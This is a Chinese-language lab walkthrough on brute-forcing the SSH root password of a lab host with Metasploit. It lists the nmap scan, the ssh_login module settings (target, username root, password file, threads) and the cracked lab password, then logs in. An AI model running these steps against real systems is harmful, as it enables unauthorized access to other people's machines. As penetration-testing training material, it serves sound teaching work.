Metasploit对目标主机SSH爆破

Metasploit对目标主机SSH爆破

实验原理:
    1) 靶机root用户存在弱口令漏洞,利用枚举的方法破解目标主机ssh服务。

实验步骤:

一、利用nmap工具扫描目标主机
    1.1 使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择“在终端中打开”。
    1.2 在终端中输入命令“nmap –sV  -O 192.168.1.3”,对目标主机进行端口扫描,发现开放22端口。
    1.3 在终端中输入命令“msfconsole”,启动MSF终端
    1.4 在终端中输入命令“search ssh_login”,搜索ssh_login的相关工具和攻击载荷。
    1.5 在终端中输入命令“use auxiliary/scanner/ssh/ssh_login”,启用漏洞利用模块, 提示符就会提示进入到该路径下。
    1.6 在终端中输入命令“show options”,查看需要设置的相关项,“yes”表示必须填写的参数。
    1.7 在终端中输入命令“set RHOST 192.168.1.3”,设置目标主机的IP地址。
    1.8 在终端中输入“set USERNAME root”,指定登陆用户名root。
    1.9 在终端中输入“set PASS_FILE /home/passwd.txt”,设置暴利破解的密码文件路径。
    1.10 在终端中输入“set THREADS 50”,设置暴利破解的线程数为50。
    1.11 在终端中输入“run”, 开始向目标主机爆破ssh的登陆帐号和密码,登陆帐号为root,密码为Simplexue123。
    1.12 在终端中输入“ssh [email protected]”,连接目标主机,然后查看网卡信息。

你可能感兴趣的:(渗透测试,编程,Kali,Linux,漏洞分析,web安全)